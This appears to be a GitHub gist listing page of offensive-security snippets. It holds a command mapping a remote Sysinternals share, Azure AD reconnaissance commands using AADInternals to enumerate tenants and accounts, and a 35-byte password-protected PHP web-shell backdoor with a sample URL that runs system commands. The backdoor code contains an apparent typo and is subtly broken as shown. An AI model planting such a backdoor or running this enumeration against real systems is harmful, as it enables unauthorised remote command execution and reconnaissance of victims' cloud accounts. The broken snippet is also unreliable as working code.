Skip to content

Instantly share code, notes, and snippets.

from @subTee
net use s: https://live.sysinternals.com" (map a drive OR S3 bucket over HTTP and read and write tools or files)
@webyeti
webyeti / AzureAD commands
Last active February 4, 2022 16:56
helpful commands to avoid typing
## get account type and domain name for an Azure account (can be a non-extant account as well)
AADInternals.psd1 (https://github.com/Gerenios/AADInternals)
Get-AADIntLoginInformation -UserName [username]@domain.onmicrosoft.com
## get tenant id for a known Azure domain
AADInternals.psd1 (https://github.com/Gerenios/AADInternals)
Get-AADIntTenantID -Domain [domain].onmicrosoft.com
## need to find a good o365/Azure email checker
o365creeper.py was from the Azure lab class
@webyeti
webyeti / PHP snippets
Last active February 4, 2022 15:25
PHP snippets
35 byte PHP backdoor protected by a password, supports arbitrary function calls.
<?=$_GET[p]==_&&$_GET[f]($GET_[c])
/backdoored.php?p=_&f=system&c=ls
//replace _ with chosen password

Keybase proof

I hereby claim:

  • I am bluejaytkd on github.
  • I am webyeti (https://keybase.io/webyeti) on keybase.
  • I have a public key whose fingerprint is 8C44 7156 2C61 5A84 3111 7403 1B1F 4908 C9B4 7801

To claim this, I am signing this object: